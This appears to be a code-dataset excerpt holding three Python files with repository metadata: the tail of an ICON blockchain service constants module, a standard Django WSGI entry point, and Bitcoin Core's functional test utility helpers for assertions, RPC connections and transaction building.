"{scoreRootPath}." \
"{stateDbRootPath}." \
"{channel}.{amqpKey}." \
"{amqpTarget}"
BUILTIN_SCORE_ADDRESS_MAPPER = {
'governance': GOVERNANCE_ADDRESS,
'system': SYSTEM_ADDRESS
}
BUILTIN_SCORE_IMPORT_WHITE_LIST = {"iconservice.iconscore.system": "['*']"}
ZERO_TX_HASH = bytes(DEFAULT_BYTE_SIZE)
class IssueDataKey:
PREP = "prep"
IREP = "irep"
RREP = "rrep"
EEP = "eep"
IEEP = "ieep"
REEP = "reep"
DAPP = "dapp"
IDAPP = "idapp"
RDAPP = "rdapp"
ISSUE_RESULT = "result"
COVERED_BY_FEE = "coveredByFee"
COVERED_BY_OVER_ISSUED_ICX = "coveredByOverIssuedICX"
ISSUE = "issue"
TOTAL_DELEGATION = "totalDelegation"
VALUE = "value"
TOTAL = "total"
ISSUE_EVENT_LOG_MAPPER = {
IssueDataKey.PREP: {
"event_signature": "PRepIssued(int,int,int,int)",
"data": [IssueDataKey.IREP, IssueDataKey.RREP, IssueDataKey.TOTAL_DELEGATION,
IssueDataKey.VALUE]
},
IssueDataKey.TOTAL: {
"event_signature": "ICXIssued(int,int,int,int)",
"data": []
}
}
ISSUE_CALCULATE_ORDER = [IssueDataKey.PREP]
BASE_TRANSACTION_INDEX = 0
class Revision(Enum):
GENESIS = 0
TWO = 2
THREE = 3
FOUR = 4
IISS = 5
DECENTRALIZATION = 6
FIX_TOTAL_ELECTED_PREP_DELEGATED = 7
# Revision 8
REALTIME_P2P_ENDPOINT_UPDATE = 8
OPTIMIZE_DIRTY_PREP_UPDATE = 8
# Revision 9
FIX_EMAIL_VALIDATION = 9
DIVIDE_NODE_ADDRESS = 9
FIX_BURN_EVENT_SIGNATURE = 9
ADD_LOGS_BLOOM_ON_BASE_TX = 9
SCORE_FUNC_PARAMS_CHECK = 9
SYSTEM_SCORE_ENABLED = 9
CHANGE_MAX_DELEGATIONS_TO_100 = 9
PREVENT_DUPLICATED_ENDPOINT = 9
SET_IREP_VIA_NETWORK_PROPOSAL = 9
MULTIPLE_UNSTAKE = 9
FIX_COIN_PART_BYTES_ENCODING = 9
STRICT_SCORE_DECORATOR_CHECK = 9
FIX_UNSTAKE_BUG = 10
LOCK_ADDRESS = 10
FIX_BALANCE_BUG = 11
BURN_V2_ENABLED = 12
IMPROVED_PRE_VALIDATOR = 12
VERIFY_ASSET_INTEGRITY = 12
USE_RLP = 12
# All revisions after Revision12 pass is_shutdown flag to loopchain
SHUTDOWN = 13
LATEST = 13
RC_DB_VERSION_0 = 0
RC_DB_VERSION_2 = 2
# The case that version is updated but not revision, set the version to the current revision
# The case that both version and revision is updated, add revision field to the version table
# The case that only revision is changed, do not update this table
RC_DATA_VERSION_TABLE = {
Revision.IISS.value: RC_DB_VERSION_0,
Revision.DECENTRALIZATION.value: RC_DB_VERSION_2
}
IISS_DB = 'iiss'
RC_SOCKET = 'iiss.sock'
META_DB = 'meta'
class ConfigKey:
BUILTIN_SCORE_OWNER = 'builtinScoreOwner'
SERVICE = 'service'
SERVICE_FEE = 'fee'
SERVICE_AUDIT = 'audit'
SERVICE_SCORE_PACKAGE_VALIDATOR = 'scorePackageValidator'
SCORE_ROOT_PATH = 'scoreRootPath'
STATE_DB_ROOT_PATH = 'stateDbRootPath'
CHANNEL = 'channel'
AMQP_KEY = 'amqpKey'
AMQP_TARGET = 'amqpTarget'
CONFIG = 'config'
TBEARS_MODE = 'tbearsMode'
IISS_CALCULATE_PERIOD = "iissCalculatePeriod"
TERM_PERIOD = 'termPeriod'
INITIAL_IREP = 'initialIRep'
PREP_MAIN_PREPS = 'mainPRepCount'
PREP_MAIN_AND_SUB_PREPS = 'mainAndSubPRepCount'
IPC_TIMEOUT = 'ipcTimeout'
DOS_GUARD = "dosGuard"
RESET_TIME = "resetTIme"
THRESHOLD = "threshold"
BAN_TIME = "banTime"
# log
LOG = 'log'
LOGGER = "logger"
LOG_FILE_PATH = 'filePath'
LOG_LEVEL = "level"
LOG_OUTPUT_TYPE = "outputType"
LOG_ROTATE = "rotate"
LOG_ROTATE_TYPE = "type"
LOG_ROTATE_PERIOD = "period"
LOG_ROTATE_INTERVAL = "interval"
LOG_ROTATE_AT_TIME = "atTime"
LOG_ROTATE_MAX_BYTES = "maxBytes"
LOG_ROTATE_BACKUP_COUNT = "backupCount"
STEP_TRACE_FLAG = 'stepTraceFlag'
PRECOMMIT_DATA_LOG_FLAG = 'precommitDataLogFlag'
# Reward calculator
# executable path
ICON_RC_DIR_PATH = 'iconRcPath'
# Boolean which determines Opening RC monitor channel (Default True)
ICON_RC_MONITOR = 'iconRcMonitor'
# IISS meta data
IISS_META_DATA = "iissMetaData"
REWARD_POINT = 'rewardPoint'
REWARD_MIN = "rewardMin"
REWARD_MAX = "rewardMAX"
UN_STAKE_LOCK_MIN = "lockMin"
UN_STAKE_LOCK_MAX = "lockMax"
PREP_REGISTRATION_FEE = "prepRegistrationFee"
DECENTRALIZE_TRIGGER = "decentralizeTrigger"
PENALTY_GRACE_PERIOD = "penaltyGracePeriod"
LOW_PRODUCTIVITY_PENALTY_THRESHOLD = "lowProductivityPenaltyThreshold"
BLOCK_VALIDATION_PENALTY_THRESHOLD = "blockValidationPenaltyThreshold"
# The maximum number of backup files for rollback
BACKUP_FILES = "backupFiles"
# Block invoke timeout in second
BLOCK_INVOKE_TIMEOUT = "blockInvokeTimeout"
UNSTAKE_SLOT_MAX = "unstakeSlotMax"
# The list of items(address, unstake, unstake_block_height)
# containing invalid expired unstakes to remove
INVALID_EXPIRED_UNSTAKES_PATH = "invalidExpiredUnstakesPath"
class EnableThreadFlag(IntFlag):
INVOKE = 1
QUERY = 2
VALIDATE = 4
class IconServiceFlag(IntFlag):
FEE = 1
AUDIT = 2
# DEPLOYER_WHITE_LIST = 4
SCORE_PACKAGE_VALIDATOR = 8
class IconNetworkValueType(Enum):
SERVICE_CONFIG = b'service_config'
STEP_PRICE = b'step_price'
STEP_COSTS = b'step_costs'
MAX_STEP_LIMITS = b'max_step_limits'
REVISION_CODE = b'revision_code'
REVISION_NAME = b'revision_name'
SCORE_BLACK_LIST = b'score_black_list'
IMPORT_WHITE_LIST = b'import_white_list'
IREP = b'irep'
@classmethod
def gs_migration_type_list(cls) -> list:
return [
cls.SERVICE_CONFIG,
cls.STEP_PRICE,
cls.STEP_COSTS,
cls.MAX_STEP_LIMITS,
cls.REVISION_CODE,
cls.REVISION_NAME,
cls.SCORE_BLACK_LIST,
cls.IMPORT_WHITE_LIST,
]
@classmethod
def gs_migration_count(cls) -> int:
return len(cls.gs_migration_type_list())
@unique
class IconScoreContextType(IntEnum):
# Write data to db directly
DIRECT = 0
# Record data to cache and after confirming the block, write them to db
INVOKE = 1
# Record data to cache for estimation of steps, discard cache after estimation.
ESTIMATION = 2
# Not possible to write data to db
QUERY = 3
@unique
class IconScoreFuncType(IntEnum):
# ReadOnly function
READONLY = 0
# Writable function
WRITABLE = 1
ENABLE_THREAD_FLAG = EnableThreadFlag.INVOKE | EnableThreadFlag.QUERY | EnableThreadFlag.VALIDATE
class DeployType(IntEnum):
INSTALL = 0
UPDATE = 1
class DeployState(IntEnum):
INACTIVE = 0
ACTIVE = 1
# 0xb9eeb235f715b166cf4b91ffcf8cc48a81913896086d30104ffc0cf47eed1cbd
INVALID_CLAIM_TX = [
b'\xb9\xee\xb25\xf7\x15\xb1f\xcfK\x91\xff\xcf\x8c\xc4\x8a\x81\x918\x96\x08m0\x10O\xfc\x0c\xf4~\xed\x1c\xbd'
]
HASH_TYPE_TABLE = [
"blockHash",
"txHash",
"prevBlockHash",
"rootHash"
]
PREP_MAIN_PREPS = 22
PREP_MAIN_AND_SUB_PREPS = 100
PREP_REGISTRATION_FEE = 2_000 * ICX_IN_LOOP
IISS_MAX_REWARD_RATE = 10_000
IISS_MIN_IREP = 10_000 * ICX_IN_LOOP
IISS_MAX_IREP_PERCENTAGE = 14
IISS_INITIAL_IREP = 50_000 * ICX_IN_LOOP
# 24 hours * 60 minutes * 60 seconds / 2 - 80 <- for PRep terms
TERM_PERIOD = 24 * 60 * 60 // 2 - 80
# 24 hours * 60 minutes * 60 seconds / 2
IISS_DAY_BLOCK = 24 * 60 * 60 // 2
IISS_MONTH_BLOCK = IISS_DAY_BLOCK * 30
IISS_MONTH = 12
IISS_ANNUAL_BLOCK = IISS_MONTH_BLOCK * IISS_MONTH
UNSTAKE_SLOT_MAX = 1_000
PERCENTAGE_FOR_BETA_2 = 100
ISCORE_EXCHANGE_RATE = 1_000
PENALTY_GRACE_PERIOD = IISS_DAY_BLOCK * 2
LOW_PRODUCTIVITY_PENALTY_THRESHOLD = 85 # Unit: Percent
BLOCK_VALIDATION_PENALTY_THRESHOLD = 660 # Unit: Blocks
BASE_TRANSACTION_VERSION = 3
PREP_PENALTY_SIGNATURE = "PenaltyImposed(Address,int,int)"
BACKUP_FILES = 10
BLOCK_INVOKE_TIMEOUT_S = 15
class RCStatus(IntEnum):
NOT_READY = 0
READY = 1
class RCCalculateResult(IntEnum):
SUCCESS = 0
FAIL = 1
IN_PROGRESS = 2
INVALID_BLOCK_HEIGHT = 3
class PRepStatus(Enum):
ACTIVE = 0
UNREGISTERED = auto()
DISQUALIFIED = auto()
class PenaltyReason(Enum):
NONE = 0
# disqualified
PREP_DISQUALIFICATION = auto()
LOW_PRODUCTIVITY = auto()
# suspended
BLOCK_VALIDATION = auto()
class PRepGrade(Enum):
MAIN = 0
SUB = 1
CANDIDATE = 2
class PRepResultState(Enum):
NORMAL = 0
IN_TERM_UPDATED = 1
class BlockVoteStatus(Enum):
NONE = 0
TRUE = 1
FALSE = 2
class PRepFlag(Flag):
"""Setting flags to True means that PRep fields specified by the flags has been changed
"""
NONE = 0
STATUS = auto()
NAME = auto()
COUNTRY = auto()
CITY = auto()
EMAIL = auto()
WEBSITE = auto()
DETAILS = auto()
P2P_ENDPOINT = auto()
PENALTY = auto()
GRADE = auto()
STAKE = auto()
DELEGATED = auto()
LAST_GENERATE_BLOCK_HEIGHT = auto()
TOTAL_BLOCKS = auto()
VALIDATED_BLOCKS = auto()
UNVALIDATED_SEQUENCE_BLOCKS = auto()
IREP = auto() # irep, irep_block_height
IREP_BLOCK_HEIGHT = auto()
NODE_ADDRESS = auto()
BLOCK_STATISTICS = TOTAL_BLOCKS | VALIDATED_BLOCKS | UNVALIDATED_SEQUENCE_BLOCKS
ALL = 0xFFFFFFFF
class PRepContainerFlag(Flag):
NONE = 0
DIRTY = auto()
class TermFlag(Flag):
NONE = 0
MAIN_PREPS = auto()
SUB_PREPS = auto()
MAIN_PREP_P2P_ENDPOINT = auto()
MAIN_PREP_NODE_ADDRESS = auto()
ALL = 0xFFFFFFFF
class RevisionChangedFlag(Flag):
# Empty
NONE = 0x0
# Set when STEP price changed on the block
# STEP_PRICE_CHANGED = 0x10
# Set when STEP costs changed on the block
# STEP_COST_CHANGED = 0x20
# Set when Max STEP limits changed on the block
# STEP_MAX_LIMIT_CHANGED = 0x40
# STEP changed flag mask
# STEP_ALL_CHANGED = 0xf0
# CHANGE REVISION
GENESIS_IISS_CALC = 0x100
IISS_CALC = 0x200
DECENTRALIZATION = 0x400
class RPCMethod:
ICX_GET_BALANCE = 'icx_getBalance'
ICX_GET_TOTAL_SUPPLY = 'icx_getTotalSupply'
ICX_GET_SCORE_API = 'icx_getScoreApi'
ISE_GET_STATUS = 'ise_getStatus'
ICX_CALL = 'icx_call'
ICX_SEND_TRANSACTION = 'icx_sendTransaction'
DEBUG_ESTIMATE_STEP = "debug_estimateStep"
DEBUG_GET_ACCOUNT = "debug_getAccount"
class DataType:
CALL = "call"
DEPLOY = "deploy"
DEPOSIT = "deposit"
MESSAGE = "message"
NONE = None
_TYPES = {CALL, DEPLOY, DEPOSIT, MESSAGE, NONE}
@classmethod
def contains(cls, value: str) -> bool:
return value in cls._TYPES
| 24.535857
| 111
| 0.695299
|
6b25f358325145e39c6f0f273bf2c88adb22d53c
| 397
|
py
|
Python
|
djangoproj/djangoproj/wsgi.py
|
olson996/django_heroku
|
0ac764a00ab7069c8f59456502e67fbe1f6d8755
|
[
"MIT"
] | null | null | null |
djangoproj/djangoproj/wsgi.py
|
olson996/django_heroku
|
0ac764a00ab7069c8f59456502e67fbe1f6d8755
|
[
"MIT"
] | null | null | null |
djangoproj/djangoproj/wsgi.py
|
olson996/django_heroku
|
0ac764a00ab7069c8f59456502e67fbe1f6d8755
|
[
"MIT"
] | null | null | null |
"""
WSGI config for djangoproj project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'djangoproj.settings')
application = get_wsgi_application()
| 23.352941
| 78
| 0.788413
|
a33bf048176dba62199cbc57a5baf585c9f0f6e1
| 22,050
|
py
|
Python
|
test/functional/test_framework/util.py
|
aentan/ain
|
1d6db33159de1c8c7930d29a0ab0902f42b728c1
|
[
"MIT"
] | null | null | null |
test/functional/test_framework/util.py
|
aentan/ain
|
1d6db33159de1c8c7930d29a0ab0902f42b728c1
|
[
"MIT"
] | null | null | null |
test/functional/test_framework/util.py
|
aentan/ain
|
1d6db33159de1c8c7930d29a0ab0902f42b728c1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Helpful routines for regression testing."""
from base64 import b64encode
from binascii import unhexlify
from decimal import Decimal, ROUND_DOWN
import inspect
import json
import logging
import os
import random
import re
from subprocess import CalledProcessError
import time
from . import coverage
from .authproxy import AuthServiceProxy, JSONRPCException
from io import BytesIO
logger = logging.getLogger("TestFramework.utils")
# Assert functions
##################
def assert_fee_amount(fee, tx_size, fee_per_kB):
"""Assert the fee was in range"""
target_fee = round(tx_size * fee_per_kB / 1000, 8)
if fee < target_fee:
raise AssertionError("Fee of %s BTC too low! (Should be %s BTC)" % (str(fee), str(target_fee)))
# allow the wallet's estimation to be at most 2 bytes off
if fee > (tx_size + 2) * fee_per_kB / 1000:
raise AssertionError("Fee of %s BTC too high! (Should be %s BTC)" % (str(fee), str(target_fee)))
def assert_equal(thing1, thing2, *args):
if thing1 != thing2 or any(thing1 != arg for arg in args):
raise AssertionError("not(%s)" % " == ".join(str(arg) for arg in (thing1, thing2) + args))
def assert_greater_than(thing1, thing2):
if thing1 <= thing2:
raise AssertionError("%s <= %s" % (str(thing1), str(thing2)))
def assert_greater_than_or_equal(thing1, thing2):
if thing1 < thing2:
raise AssertionError("%s < %s" % (str(thing1), str(thing2)))
def assert_raises(exc, fun, *args, **kwds):
assert_raises_message(exc, None, fun, *args, **kwds)
def assert_raises_message(exc, message, fun, *args, **kwds):
try:
fun(*args, **kwds)
except JSONRPCException:
raise AssertionError("Use assert_raises_rpc_error() to test RPC failures")
except exc as e:
if message is not None and message not in e.error['message']:
raise AssertionError("Expected substring not found:" + e.error['message'])
except Exception as e:
raise AssertionError("Unexpected exception raised: " + type(e).__name__)
else:
raise AssertionError("No exception raised")
def assert_raises_process_error(returncode, output, fun, *args, **kwds):
"""Execute a process and asserts the process return code and output.
Calls function `fun` with arguments `args` and `kwds`. Catches a CalledProcessError
and verifies that the return code and output are as expected. Throws AssertionError if
no CalledProcessError was raised or if the return code and output are not as expected.
Args:
returncode (int): the process return code.
output (string): [a substring of] the process output.
fun (function): the function to call. This should execute a process.
args*: positional arguments for the function.
kwds**: named arguments for the function.
"""
try:
fun(*args, **kwds)
except CalledProcessError as e:
if returncode != e.returncode:
raise AssertionError("Unexpected returncode %i" % e.returncode)
if output not in e.output:
raise AssertionError("Expected substring not found:" + e.output)
else:
raise AssertionError("No exception raised")
def assert_raises_rpc_error(code, message, fun, *args, **kwds):
"""Run an RPC and verify that a specific JSONRPC exception code and message is raised.
Calls function `fun` with arguments `args` and `kwds`. Catches a JSONRPCException
and verifies that the error code and message are as expected. Throws AssertionError if
no JSONRPCException was raised or if the error code/message are not as expected.
Args:
code (int), optional: the error code returned by the RPC call (defined
in src/rpc/protocol.h). Set to None if checking the error code is not required.
message (string), optional: [a substring of] the error string returned by the
RPC call. Set to None if checking the error string is not required.
fun (function): the function to call. This should be the name of an RPC.
args*: positional arguments for the function.
kwds**: named arguments for the function.
"""
assert try_rpc(code, message, fun, *args, **kwds), "No exception raised"
def try_rpc(code, message, fun, *args, **kwds):
"""Tries to run an rpc command.
Test against error code and message if the rpc fails.
Returns whether a JSONRPCException was raised."""
try:
fun(*args, **kwds)
except JSONRPCException as e:
# JSONRPCException was thrown as expected. Check the code and message values are correct.
if (code is not None) and (code != e.error["code"]):
raise AssertionError("Unexpected JSONRPC error code %i" % e.error["code"])
if (message is not None) and (message not in e.error['message']):
raise AssertionError("Expected substring not found:" + e.error['message'])
return True
except Exception as e:
raise AssertionError("Unexpected exception raised: " + type(e).__name__)
else:
return False
def assert_is_hex_string(string):
try:
int(string, 16)
except Exception as e:
raise AssertionError(
"Couldn't interpret %r as hexadecimal; raised: %s" % (string, e))
def assert_is_hash_string(string, length=64):
if not isinstance(string, str):
raise AssertionError("Expected a string, got type %r" % type(string))
elif length and len(string) != length:
raise AssertionError(
"String of length %d expected; got %d" % (length, len(string)))
elif not re.match('[abcdef0-9]+$', string):
raise AssertionError(
"String %r contains invalid characters for a hash." % string)
def assert_array_result(object_array, to_match, expected, should_not_find=False):
"""
Pass in array of JSON objects, a dictionary with key/value pairs
to match against, and another dictionary with expected key/value
pairs.
If the should_not_find flag is true, to_match should not be found
in object_array
"""
if should_not_find:
assert_equal(expected, {})
num_matched = 0
for item in object_array:
all_match = True
for key, value in to_match.items():
if item[key] != value:
all_match = False
if not all_match:
continue
elif should_not_find:
num_matched = num_matched + 1
for key, value in expected.items():
if item[key] != value:
raise AssertionError("%s : expected %s=%s" % (str(item), str(key), str(value)))
num_matched = num_matched + 1
if num_matched == 0 and not should_not_find:
raise AssertionError("No objects matched %s" % (str(to_match)))
if num_matched > 0 and should_not_find:
raise AssertionError("Objects were found %s" % (str(to_match)))
# Utility functions
###################
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n))) * 1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def count_bytes(hex_string):
return len(bytearray.fromhex(hex_string))
def hex_str_to_bytes(hex_str):
return unhexlify(hex_str.encode('ascii'))
def str_to_b64str(string):
return b64encode(string.encode('utf-8')).decode('ascii')
def satoshi_round(amount):
return Decimal(amount).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
def wait_until(predicate, *, attempts=float('inf'), timeout=float('inf'), lock=None):
if attempts == float('inf') and timeout == float('inf'):
timeout = 60
attempt = 0
time_end = time.time() + timeout
while attempt < attempts and time.time() < time_end:
if lock:
with lock:
if predicate():
return
else:
if predicate():
return
attempt += 1
time.sleep(0.05)
# Print the cause of the timeout
predicate_source = "''''\n" + inspect.getsource(predicate) + "'''"
logger.error("wait_until() failed. Predicate: {}".format(predicate_source))
if attempt >= attempts:
raise AssertionError("Predicate {} not true after {} attempts".format(predicate_source, attempts))
elif time.time() >= time_end:
raise AssertionError("Predicate {} not true after {} seconds".format(predicate_source, timeout))
raise RuntimeError('Unreachable')
# RPC/P2P connection constants and functions
############################################
# The maximum number of nodes a single test can spawn
MAX_NODES = 4
# Don't assign rpc or p2p ports lower than this
PORT_MIN = 11000
# The number of ports to "reserve" for p2p and rpc, each
PORT_RANGE = 5000
class PortSeed:
# Must be initialized with a unique integer for each process
n = None
def get_rpc_proxy(url, node_number, timeout=None, coveragedir=None):
"""
Args:
url (str): URL of the RPC server to call
node_number (int): the node number (or id) that this calls to
Kwargs:
timeout (int): HTTP timeout in seconds
Returns:
AuthServiceProxy. convenience object for making RPC calls.
"""
proxy_kwargs = {}
if timeout is not None:
proxy_kwargs['timeout'] = timeout
proxy = AuthServiceProxy(url, **proxy_kwargs)
proxy.url = url # store URL on proxy for info
coverage_logfile = coverage.get_filename(
coveragedir, node_number) if coveragedir else None
return coverage.AuthServiceProxyWrapper(proxy, coverage_logfile)
def p2p_port(n):
assert n <= MAX_NODES
return PORT_MIN + n + (MAX_NODES * PortSeed.n) % (PORT_RANGE - 1 - MAX_NODES)
def rpc_port(n):
return PORT_MIN + PORT_RANGE + n + (MAX_NODES * PortSeed.n) % (PORT_RANGE - 1 - MAX_NODES)
def rpc_url(datadir, i, chain, rpchost):
rpc_u, rpc_p = get_auth_cookie(datadir, chain)
host = '127.0.0.1'
port = rpc_port(i)
if rpchost:
parts = rpchost.split(':')
if len(parts) == 2:
host, port = parts
else:
host = rpchost
return "http://%s:%s@%s:%d" % (rpc_u, rpc_p, host, int(port))
# Node functions
################
def initialize_datadir(dirname, n, chain):
datadir = get_datadir_path(dirname, n)
if not os.path.isdir(datadir):
os.makedirs(datadir)
with open(os.path.join(datadir, "bitcoin.conf"), 'w', encoding='utf8') as f:
f.write("{}=1\n".format(chain))
f.write("[{}]\n".format(chain))
f.write("port=" + str(p2p_port(n)) + "\n")
f.write("rpcport=" + str(rpc_port(n)) + "\n")
f.write("server=1\n")
f.write("keypool=1\n")
f.write("discover=0\n")
f.write("listenonion=0\n")
f.write("printtoconsole=0\n")
f.write("upnp=0\n")
os.makedirs(os.path.join(datadir, 'stderr'), exist_ok=True)
os.makedirs(os.path.join(datadir, 'stdout'), exist_ok=True)
return datadir
def get_datadir_path(dirname, n):
return os.path.join(dirname, "node" + str(n))
def append_config(datadir, options):
with open(os.path.join(datadir, "bitcoin.conf"), 'a', encoding='utf8') as f:
for option in options:
f.write(option + "\n")
def get_auth_cookie(datadir, chain):
user = None
password = None
if os.path.isfile(os.path.join(datadir, "bitcoin.conf")):
with open(os.path.join(datadir, "bitcoin.conf"), 'r', encoding='utf8') as f:
for line in f:
if line.startswith("rpcuser="):
assert user is None # Ensure that there is only one rpcuser line
user = line.split("=")[1].strip("\n")
if line.startswith("rpcpassword="):
assert password is None # Ensure that there is only one rpcpassword line
password = line.split("=")[1].strip("\n")
try:
with open(os.path.join(datadir, chain, ".cookie"), 'r', encoding="ascii") as f:
userpass = f.read()
split_userpass = userpass.split(':')
user = split_userpass[0]
password = split_userpass[1]
except OSError:
pass
if user is None or password is None:
raise ValueError("No RPC credentials")
return user, password
# If a cookie file exists in the given datadir, delete it.
def delete_cookie_file(datadir, chain):
if os.path.isfile(os.path.join(datadir, chain, ".cookie")):
logger.debug("Deleting leftover cookie file")
os.remove(os.path.join(datadir, chain, ".cookie"))
def softfork_active(node, key):
"""Return whether a softfork is active."""
return node.getblockchaininfo()['softforks'][key]['active']
def set_node_times(nodes, t):
for node in nodes:
node.setmocktime(t)
def disconnect_nodes(from_connection, node_num):
for peer_id in [peer['id'] for peer in from_connection.getpeerinfo() if "testnode%d" % node_num in peer['subver']]:
try:
from_connection.disconnectnode(nodeid=peer_id)
except JSONRPCException as e:
# If this node is disconnected between calculating the peer id
# and issuing the disconnect, don't worry about it.
# This avoids a race condition if we're mass-disconnecting peers.
if e.error['code'] != -29: # RPC_CLIENT_NODE_NOT_CONNECTED
raise
# wait to disconnect
wait_until(lambda: [peer['id'] for peer in from_connection.getpeerinfo() if "testnode%d" % node_num in peer['subver']] == [], timeout=5)
def connect_nodes(from_connection, node_num):
ip_port = "127.0.0.1:" + str(p2p_port(node_num))
from_connection.addnode(ip_port, "onetry")
# poll until version handshake complete to avoid race conditions
# with transaction relaying
wait_until(lambda: all(peer['version'] != 0 for peer in from_connection.getpeerinfo()))
def connect_nodes_bi(nodes, a, b):
connect_nodes(nodes[a], b)
connect_nodes(nodes[b], a)
def sync_blocks(rpc_connections, *, wait=1, timeout=60):
"""
Wait until everybody has the same tip.
sync_blocks needs to be called with an rpc_connections set that has least
one node already synced to the latest, stable tip, otherwise there's a
chance it might return before all nodes are stably synced.
"""
stop_time = time.time() + timeout
while time.time() <= stop_time:
best_hash = [x.getbestblockhash() for x in rpc_connections]
if best_hash.count(best_hash[0]) == len(rpc_connections):
return
time.sleep(wait)
raise AssertionError("Block sync timed out:{}".format("".join("\n {!r}".format(b) for b in best_hash)))
def sync_mempools(rpc_connections, *, wait=1, timeout=60, flush_scheduler=True):
"""
Wait until everybody has the same transactions in their memory
pools
"""
stop_time = time.time() + timeout
while time.time() <= stop_time:
pool = [set(r.getrawmempool()) for r in rpc_connections]
if pool.count(pool[0]) == len(rpc_connections):
if flush_scheduler:
for r in rpc_connections:
r.syncwithvalidationinterfacequeue()
return
time.sleep(wait)
raise AssertionError("Mempool sync timed out:{}".format("".join("\n {!r}".format(m) for m in pool)))
# Transaction/Block functions
#############################
def find_output(node, txid, amount, *, blockhash=None):
"""
Return index to output of txid with value amount
Raises exception if there is none.
"""
txdata = node.getrawtransaction(txid, 1, blockhash)
for i in range(len(txdata["vout"])):
if txdata["vout"][i]["value"] == amount:
return i
raise RuntimeError("find_output txid %s : %s not found" % (txid, str(amount)))
def gather_inputs(from_node, amount_needed, confirmations_required=1):
"""
Return a random set of unspent txouts that are enough to pay amount_needed
"""
assert confirmations_required >= 0
utxo = from_node.listunspent(confirmations_required)
random.shuffle(utxo)
inputs = []
total_in = Decimal("0.00000000")
while total_in < amount_needed and len(utxo) > 0:
t = utxo.pop()
total_in += t["amount"]
inputs.append({"txid": t["txid"], "vout": t["vout"], "address": t["address"]})
if total_in < amount_needed:
raise RuntimeError("Insufficient funds: need %d, have %d" % (amount_needed, total_in))
return (total_in, inputs)
def make_change(from_node, amount_in, amount_out, fee):
"""
Create change output(s), return them
"""
outputs = {}
amount = amount_out + fee
change = amount_in - amount
if change > amount * 2:
# Create an extra change output to break up big inputs
change_address = from_node.getnewaddress()
# Split change in two, being careful of rounding:
outputs[change_address] = Decimal(change / 2).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
change = amount_in - amount - outputs[change_address]
if change > 0:
outputs[from_node.getnewaddress()] = change
return outputs
def random_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment * random.randint(0, fee_variants)
(total_in, inputs) = gather_inputs(from_node, amount + fee)
outputs = make_change(from_node, total_in, amount, fee)
outputs[to_node.getnewaddress()] = float(amount)
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransactionwithwallet(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], 0)
return (txid, signresult["hex"], fee)
# Helper to create at least "count" utxos
# Pass in a fee that is sufficient for relay and mining new transactions.
def create_confirmed_utxos(fee, node, count):
to_generate = int(0.5 * count) + 101
while to_generate > 0:
node.generate(min(25, to_generate))
to_generate -= 25
utxos = node.listunspent()
iterations = count - len(utxos)
addr1 = node.getnewaddress()
addr2 = node.getnewaddress()
if iterations <= 0:
return utxos
for i in range(iterations):
t = utxos.pop()
inputs = []
inputs.append({"txid": t["txid"], "vout": t["vout"]})
outputs = {}
send_value = t['amount'] - fee
outputs[addr1] = satoshi_round(send_value / 2)
outputs[addr2] = satoshi_round(send_value / 2)
raw_tx = node.createrawtransaction(inputs, outputs)
signed_tx = node.signrawtransactionwithwallet(raw_tx)["hex"]
node.sendrawtransaction(signed_tx)
while (node.getmempoolinfo()['size'] > 0):
node.generate(1)
utxos = node.listunspent()
assert len(utxos) >= count
return utxos
# Create large OP_RETURN txouts that can be appended to a transaction
# to make it large (helper for constructing large transactions).
def gen_return_txouts():
# Some pre-processing to create a bunch of OP_RETURN txouts to insert into transactions we create
# So we have big transactions (and therefore can't fit very many into each block)
# create one script_pubkey
script_pubkey = "6a4d0200" # OP_RETURN OP_PUSH2 512 bytes
for i in range(512):
script_pubkey = script_pubkey + "01"
# concatenate 128 txouts of above script_pubkey which we'll insert before the txout for change
txouts = []
from .messages import CTxOut
txout = CTxOut()
txout.nValue = 0
txout.scriptPubKey = hex_str_to_bytes(script_pubkey)
for k in range(128):
txouts.append(txout)
return txouts
# Create a spend of each passed-in utxo, splicing in "txouts" to each raw
# transaction to make it large. See gen_return_txouts() above.
def create_lots_of_big_transactions(node, txouts, utxos, num, fee):
addr = node.getnewaddress()
txids = []
from .messages import CTransaction
for _ in range(num):
t = utxos.pop()
inputs = [{"txid": t["txid"], "vout": t["vout"]}]
outputs = {}
change = t['amount'] - fee
outputs[addr] = satoshi_round(change)
rawtx = node.createrawtransaction(inputs, outputs)
tx = CTransaction()
tx.deserialize(BytesIO(hex_str_to_bytes(rawtx)))
for txout in txouts:
tx.vout.append(txout)
newtx = tx.serialize().hex()
signresult = node.signrawtransactionwithwallet(newtx, None, "NONE")
txid = node.sendrawtransaction(signresult["hex"], 0)
txids.append(txid)
return txids
def mine_large_block(node, utxos=None):
# generate a 66k transaction,
# and 14 of them is close to the 1MB block limit
num = 14
txouts = gen_return_txouts()
utxos = utxos if utxos is not None else []
if len(utxos) < num:
utxos.clear()
utxos.extend(node.listunspent())
fee = 100 * node.getnetworkinfo()["relayfee"]
create_lots_of_big_transactions(node, txouts, utxos, num, fee=fee)
node.generate(1)
def find_vout_for_address(node, txid, addr):
"""
Locate the vout index of the given transaction sending to the
given address. Raises runtime error exception if not found.
"""
tx = node.getrawtransaction(txid, True)
for i in range(len(tx["vout"])):
if any([addr == a for a in tx["vout"][i]["scriptPubKey"]["addresses"]]):
return i
raise RuntimeError("Vout not found for address: txid=%s, addr=%s" % (txid, addr))
| 38.820423
| 140
| 0.652063
|
6ebefd751306fd50dad0ec67488574f2f6f6120d
| 4,713
|
py
|
Python
|
